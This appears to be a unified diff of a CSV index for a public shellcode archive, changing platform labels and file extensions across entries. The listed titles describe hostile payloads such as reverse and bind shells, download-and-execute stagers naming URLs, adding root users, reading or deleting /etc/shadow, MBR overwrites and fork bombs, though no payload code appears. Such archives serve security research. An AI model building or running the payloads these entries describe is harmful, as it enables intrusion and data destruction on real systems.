13296,shellcodes/linux_x86-64/13296.c,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,shellcode,linux_x86-64
13297,shellcodes/generator/13297.c,"Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator
13296,shellcodes/linux_x86-64/13296.c,"Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,shellcode,linux_x86-64
13297,shellcodes/generator/13297.c,"Linux/x64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator
13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
13299,shellcodes/linux_mips/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]) Shellcode (60 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
13300,shellcodes/linux_mips/13300.c,"Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes)",2005-11-09,core,shellcode,linux_mips
@ -75,7 +75,7 @@ id,file,description,date,author,type,platform
13317,shellcodes/linux_x86/13317.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
13318,shellcodes/linux_x86/13318.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
13319,shellcodes/linux_x86/13319.s,"Linux/x86 - Bind TCP (8000/TCP) Shell (/bin/sh) Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",shellcode,linux_x86
13320,shellcodes/linux_x86-64/13320.c,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,shellcode,linux_x86-64
13320,shellcodes/linux_x86-64/13320.c,"Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,shellcode,linux_x86-64
13321,shellcodes/linux_x86/13321.c,"Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes)",2009-04-30,phar,shellcode,linux_x86
13322,shellcodes/linux_x86/13322.c,"Linux/x86 - File Unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,shellcode,linux_x86
13323,shellcodes/linux_x86/13323.c,"Linux/x86 - Perl Script Execution Shellcode (99+ bytes)",2009-03-03,darkjoker,shellcode,linux_x86
@ -179,7 +179,7 @@ id,file,description,date,author,type,platform
13421,shellcodes/linux_x86/13421.c,"Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)",2004-12-22,xort,shellcode,linux_x86
13422,shellcodes/linux_x86/13422.c,"Linux/x86 - execve() Shellcode (23 bytes)",2004-11-15,marcetam,shellcode,linux_x86
13423,shellcodes/linux_x86/13423.c,"Linux/x86 - execve(_/bin/ash__0_0) Shellcode (21 bytes)",2004-11-15,zasta,shellcode,linux_x86
13424,shellcodes/linux_x86/13424.txt,"Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
13424,shellcodes/linux_x86/13424.c,"Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve(/bin/sh) + 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86
13426,shellcodes/bsd_x86/13426.c,"BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86
@ -218,8 +218,8 @@ id,file,description,date,author,type,platform
13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86
13461,shellcodes/linux_x86/13461.c,"Linux/x86 - Add Root User (z) To /etc/passwd Shellcode (70 bytes)",2000-08-07,anonymous,shellcode,linux_x86
13462,shellcodes/linux_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,linux_x86
13463,shellcodes/linux_x86-64/13463.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64
13464,shellcodes/linux_x86-64/13464.s,"Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,shellcode,linux_x86-64
13463,shellcodes/linux_x86-64/13463.c,"Linux/x64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64
13464,shellcodes/linux_x86-64/13464.s,"Linux/x64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,shellcode,linux_x86-64
13465,shellcodes/multiple/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",shellcode,multiple
13466,shellcodes/multiple/13466.c,"OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,shellcode,multiple
13467,shellcodes/multiple/13467.c,"Linux/x86 / Unix/SPARC / IRIX/MIPS - execve(/bin/sh) Shellcode (141 bytes)",2004-09-12,dymitri,shellcode,multiple
@ -229,7 +229,7 @@ id,file,description,date,author,type,platform
13471,shellcodes/netbsd_x86/13471.c,"NetBSD/x86 - Reverse TCP (6666/TCP) Shell Shellcode (83 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13472,shellcodes/netbsd_x86/13472.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (29 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13473,shellcodes/netbsd_x86/13473.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (30 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13474,shellcodes/netbsd_x86/13474.txt,"NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86
13474,shellcodes/netbsd_x86/13474.c,"NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86
13475,shellcodes/openbsd_x86/13475.c,"OpenBSD/x86 - execve(/bin/sh) Shellcode (23 bytes)",2006-05-01,hophet,shellcode,openbsd_x86
13476,shellcodes/openbsd_x86/13476.c,"OpenBSD/x86 - Bind TCP (6969/TCP) Shell Shellcode (148 bytes)",2004-09-26,"Sinan Eren",shellcode,openbsd_x86
13477,shellcodes/openbsd_x86/13477.c,"OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes)",2004-09-26,anonymous,shellcode,openbsd_x86
@ -249,16 +249,16 @@ id,file,description,date,author,type,platform
13491,shellcodes/generator/13491.c,"Solaris/MIPS - Reverse TCP (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator
13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid() + execve() Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
13494,shellcodes/solaris_sparc/13494.txt,"Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc
13494,shellcodes/solaris_sparc/13494.c,"Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc
13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc
13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc
13497,shellcodes/solaris_sparc/13497.txt,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc
13497,shellcodes/solaris_sparc/13497.c,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc
13498,shellcodes/generator/13498.php,"Solaris/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",shellcode,generator
13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) + Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
13500,shellcodes/solaris_x86/13500.c,"Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
13501,shellcodes/solaris_x86/13501.txt,"Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
13502,shellcodes/solaris_x86/13502.txt,"Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
13503,shellcodes/unixware/13503.txt,"UnixWare - execve(/bin/sh) Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware
13501,shellcodes/solaris_x86/13501.c,"Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
13502,shellcodes/solaris_x86/13502.c,"Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
13503,shellcodes/unixware/13503.c,"UnixWare - execve(/bin/sh) Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware
13504,shellcodes/windows_x86/13504.asm,"Windows/x86 (5.0 < 7.0) - Bind TCP (28876/TCP) Shell + Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86
13505,shellcodes/windows_x86/13505.c,"Windows/x86 (XP SP2) (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,windows_x86
13507,shellcodes/windows_x86/13507.txt,"Windows/x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,windows_x86
@ -268,7 +268,7 @@ id,file,description,date,author,type,platform
13511,shellcodes/windows_x86/13511.c,"Windows/x86 (XP SP2) - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,shellcode,windows_x86
13512,shellcodes/windows_x86/13512.c,"Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,shellcode,windows_x86
13513,shellcodes/windows_x86/13513.c,"Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + ASCII Printable Shellcode (49 bytes)",2008-09-03,Koshi,shellcode,windows_x86
13514,shellcodes/windows_x86/13514.asm,"Windows/x86 - Reverse TCP + Download A File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86
13514,shellcodes/windows_x86/13514.asm,"Windows/x86 - Reverse TCP + Download File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86
13515,shellcodes/generator/13515.pl,"Windows/x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)",2008-03-14,"YAG KOHHA",shellcode,generator
13516,shellcodes/windows_x86/13516.asm,"Windows/x86 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,shellcode,windows_x86
13517,shellcodes/windows_x86/13517.asm,"Windows/x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)",2007-06-14,Weiss,shellcode,windows_x86
@ -287,7 +287,7 @@ id,file,description,date,author,type,platform
13530,shellcodes/windows_x86/13530.asm,"Windows (XP) - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) + Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",shellcode,windows_x86
13531,shellcodes/windows_x86/13531.c,"Windows (XP SP1) - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)",2004-09-26,silicon,shellcode,windows_x86
13532,shellcodes/windows_x86/13532.asm,"Windows - DCOM RPC2 Universal Shellcode",2003-10-09,anonymous,shellcode,windows_x86
13533,shellcodes/windows_x86-64/13533.asm,"Windows/x86-64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,windows_x86-64
13533,shellcodes/windows_x86-64/13533.asm,"Windows/x64 - URLDownloadToFileA(http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,windows_x86-64
13548,shellcodes/linux_x86/13548.asm,"Linux/x86 - Kill All Processes Shellcode (9 bytes)",2010-01-14,root@thegibson,shellcode,linux_x86
13549,shellcodes/linux_x86/13549.c,"Linux/x86 - setuid(0) + execve(/sbin/poweroff -f) Shellcode (47 bytes)",2009-12-04,ka0x,shellcode,linux_x86
13550,shellcodes/linux_x86/13550.c,"Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,shellcode,linux_x86
@ -295,7 +295,7 @@ id,file,description,date,author,type,platform
13553,shellcodes/linux_x86/13553.c,"Linux/x86 - execve() Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",shellcode,linux_x86
13560,shellcodes/windows/13560.txt,"Windows (XP SP2) - PEB ISbeingdebugged Beep Shellcode (56 bytes)",2009-12-14,anonymous,shellcode,windows
13563,shellcodes/linux_x86/13563.asm,"Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,shellcode,linux_x86
13565,shellcodes/windows_x86/13565.asm,"Windows/x86 (XP SP3) - ShellExecuteA Shellcode",2009-12-19,sinn3r,shellcode,windows_x86
13565,shellcodes/windows_x86/13565.asm,"Windows/x86 (XP SP3) - ShellExecuteA() Shellcode",2009-12-19,sinn3r,shellcode,windows_x86
13566,shellcodes/linux_x86/13566.c,"Linux/x86 - setreuid(0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,shellcode,linux_x86
13569,shellcodes/windows_x86/13569.asm,"Windows/x86 (XP SP3) - Add Firewall Rule (Allow 445/TCP) Shellcode",2009-12-24,sinn3r,shellcode,windows_x86
13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes)",2009-12-24,sbz,shellcode,freebsd_x86
@ -304,16 +304,16 @@ id,file,description,date,author,type,platform
13574,shellcodes/windows_x86/13574.c,"Windows/x86 (XP SP2) (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86
13576,shellcodes/linux_x86/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,shellcode,linux_x86
13577,shellcodes/linux_x86/13577.txt,"Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,linux_x86
13578,shellcodes/linux_x86/13578.txt,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,linux_x86
13578,shellcodes/linux_x86/13578.asm,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,linux_x86
13579,shellcodes/linux_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes)",2009-12-31,$andman,shellcode,linux_x86
13581,shellcodes/windows/13581.txt,"Windows (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows
13582,shellcodes/windows/13582.txt,"Windows (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows
13586,shellcodes/linux_x86/13586.txt,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,linux_x86
13586,shellcodes/linux_x86/13586.asm,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,linux_x86
13595,shellcodes/windows_x86/13595.c,"Windows/x86 (XP SP2) (French) - calc.exe Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,shellcode,windows_x86
13599,shellcodes/linux_x86/13599.txt,"Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13600,shellcodes/linux_x86/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13601,shellcodes/linux_x86/13601.txt,"Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13602,shellcodes/linux_x86/13602.txt,"Linux/i686 - pacman -R <package> Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13599,shellcodes/linux_x86/13599.c,"Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13600,shellcodes/linux_x86/13600.c,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13601,shellcodes/linux_x86/13601.c,"Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13602,shellcodes/linux_x86/13602.c,"Linux/i686 - pacman -R <package> Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13609,shellcodes/linux_x86/13609.c,"Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (43 bytes)",2010-02-09,fb1h2s,shellcode,linux_x86
13614,shellcodes/windows_x86/13614.c,"Windows/x86 (XP SP3) (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
13615,shellcodes/windows_x86/13615.c,"Windows/x86 (XP SP2) (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
@ -322,14 +322,14 @@ id,file,description,date,author,type,platform
13630,shellcodes/windows_x86/13630.c,"Windows (XP Home SP2) (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",shellcode,windows_x86
13631,shellcodes/windows_x86/13631.c,"Windows (XP Home SP3) (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",shellcode,windows_x86
13632,shellcodes/linux_x86/13632.c,"Linux/x86 - Disable modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,shellcode,linux_x86
13635,shellcodes/windows_x86/13635.txt,"Windows/x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",shellcode,windows_x86
13635,shellcodes/windows_x86/13635.as,"Windows/x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",shellcode,windows_x86
13636,shellcodes/windows_x86/13636.c,"Windows/x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",shellcode,windows_x86
13639,shellcodes/windows_x86/13639.c,"Windows (XP Professional SP2) (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,shellcode,windows_x86
13642,shellcodes/windows_x86/13642.txt,"Windows/x86 (XP SP2) - WinExec (write.exe) + ExitProcess Shellcode (16 bytes)",2010-03-18,czy,shellcode,windows_x86
13642,shellcodes/windows_x86/13642.asm,"Windows/x86 (XP SP2) - WinExec(write.exe) + ExitProcess Shellcode (16 bytes)",2010-03-18,czy,shellcode,windows_x86
13645,shellcodes/windows/13645.c,"Windows - Egghunter (0x07333531) JITed Stage-0 Shellcode",2010-03-20,"Alexey Sintsov",shellcode,windows
13647,shellcodes/windows_x86/13647.txt,"Windows/x86 (XP SP3) (Russia) - WinExec(cmd.exe) + ExitProcess Shellcode (12 bytes)",2010-03-24,"lord Kelvin",shellcode,windows_x86
13648,shellcodes/windows_x86/13648.rb,"Windows/x86 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,shellcode,windows_x86
13649,shellcodes/windows/13649.txt,"Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows
13648,shellcodes/windows_x86/13648.rb,"Windows/x86 - MessageBox Shellcode (Generator) (Metasploit)",2010-03-24,corelanc0d3r,shellcode,windows_x86
13649,shellcodes/windows/13649.as,"Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows
13661,shellcodes/linux_x86/13661.txt,"Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode",2010-04-02,anonymous,shellcode,linux_x86
13669,shellcodes/linux_x86/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
13670,shellcodes/linux_x86/13670.c,"Linux/x86 - execve(/bin/sh) Shellcode (25 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
@ -342,14 +342,14 @@ id,file,description,date,author,type,platform
13680,shellcodes/linux_x86/13680.c,"Linux/x86 - Fork Bomb + Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86
13681,shellcodes/linux_x86/13681.c,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (2)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86
13682,shellcodes/linux_x86/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) + execve(/bin/sh) Shellcode (34 bytes)",2010-04-22,Magnefikko,shellcode,linux_x86
13688,shellcodes/linux_x86-64/13688.c,"Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,shellcode,linux_x86-64
13691,shellcodes/linux_x86-64/13691.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)",2010-04-25,zbt,shellcode,linux_x86-64
13688,shellcodes/linux_x86-64/13688.c,"Linux/x64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,shellcode,linux_x86-64
13691,shellcodes/linux_x86-64/13691.c,"Linux/x64 - execve(/bin/sh) Shellcode (30 bytes)",2010-04-25,zbt,shellcode,linux_x86-64
13692,shellcodes/linux_x86/13692.c,"Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)",2010-04-25,condis,shellcode,linux_x86
13697,shellcodes/linux_x86/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",shellcode,linux_x86
13698,shellcodes/linux_x86/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) + Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",shellcode,linux_x86
13699,shellcodes/windows_x86/13699.txt,"Windows (XP SP2) (French) - Download File (http://www.site.com/nc.exe) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,shellcode,windows_x86
13702,shellcodes/linux_x86/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_) Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",shellcode,linux_x86
13703,shellcodes/linux_x86/13703.txt,"Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13703,shellcodes/linux_x86/13703.c,"Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13704,shellcodes/solaris_x86/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86
13707,shellcodes/solaris_x86/13707.c,"Solaris/x86 - Halt Shellcode (36 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86
13709,shellcodes/solaris_x86/13709.c,"Solaris/x86 - Reboot() Shellcode (37 bytes)",2010-05-21,"Jonathan Salwan",shellcode,solaris_x86
@ -357,14 +357,14 @@ id,file,description,date,author,type,platform
13712,shellcodes/linux_x86/13712.c,"Linux/x86 - Disable ASLR Security Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",shellcode,linux_x86
13715,shellcodes/linux_x86/13715.c,"Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,shellcode,linux_x86
13716,shellcodes/linux_x86/13716.c,"Linux/x86 - Fork Bomb + Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,shellcode,linux_x86
13719,shellcodes/windows_x86-64/13719.txt,"Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,windows_x86-64
13719,shellcodes/windows_x86-64/13719.c,"Windows/x64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,windows_x86-64
13722,shellcodes/linux_x86/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,shellcode,linux_x86
13723,shellcodes/linux_x86/13723.c,"Linux/x86 - chmod 0777 /etc/shadow + sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13724,shellcodes/linux_x86/13724.c,"Linux/x86 - Kill All Running Process Shellcode (11 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13725,shellcodes/linux_x86/13725.txt,"Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13726,shellcodes/linux_x86/13726.txt,"Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13725,shellcodes/linux_x86/13725.c,"Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13726,shellcodes/linux_x86/13726.c,"Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13728,shellcodes/linux_x86/13728.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,linux_x86
13729,shellcodes/windows_x86-64/13729.txt,"Windows/x86-64 (7) - cmd.exe Shellcode (61 bytes)",2010-06-01,agix,shellcode,windows_x86-64
13729,shellcodes/windows_x86-64/13729.c,"Windows/x64 (7) - cmd.exe Shellcode (61 bytes)",2010-06-01,agix,shellcode,windows_x86-64
13730,shellcodes/linux_x86/13730.c,"Linux/x86 - unlink(/etc/shadow) Shellcode (33 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
13731,shellcodes/linux_x86/13731.c,"Linux/x86 - Hard Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86
13732,shellcodes/linux_x86/13732.c,"Linux/x86 - Hard Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86
@ -372,19 +372,19 @@ id,file,description,date,author,type,platform
13742,shellcodes/linux_x86/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,shellcode,linux_x86
13743,shellcodes/linux_x86/13743.c,"Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,shellcode,linux_x86
14334,shellcodes/linux_x86/14334.c,"Linux/x86 - Reverse TCP (8080/TCP) Netcat Shell Shellcode (76 bytes)",2010-07-11,blake,shellcode,linux_x86
13828,shellcodes/windows/13828.c,"Windows - MessageBoxA Shellcode (238 bytes)",2010-06-11,RubberDuck,shellcode,windows
13828,shellcodes/windows/13828.c,"Windows - MessageBoxA() Shellcode (238 bytes)",2010-06-11,RubberDuck,shellcode,windows
13875,shellcodes/solaris_x86/13875.c,"Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",shellcode,solaris_x86
13908,shellcodes/linux_x86-64/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
13908,shellcodes/linux_x86-64/13908.c,"Linux/x64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
13910,shellcodes/linux_x86/13910.c,"Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
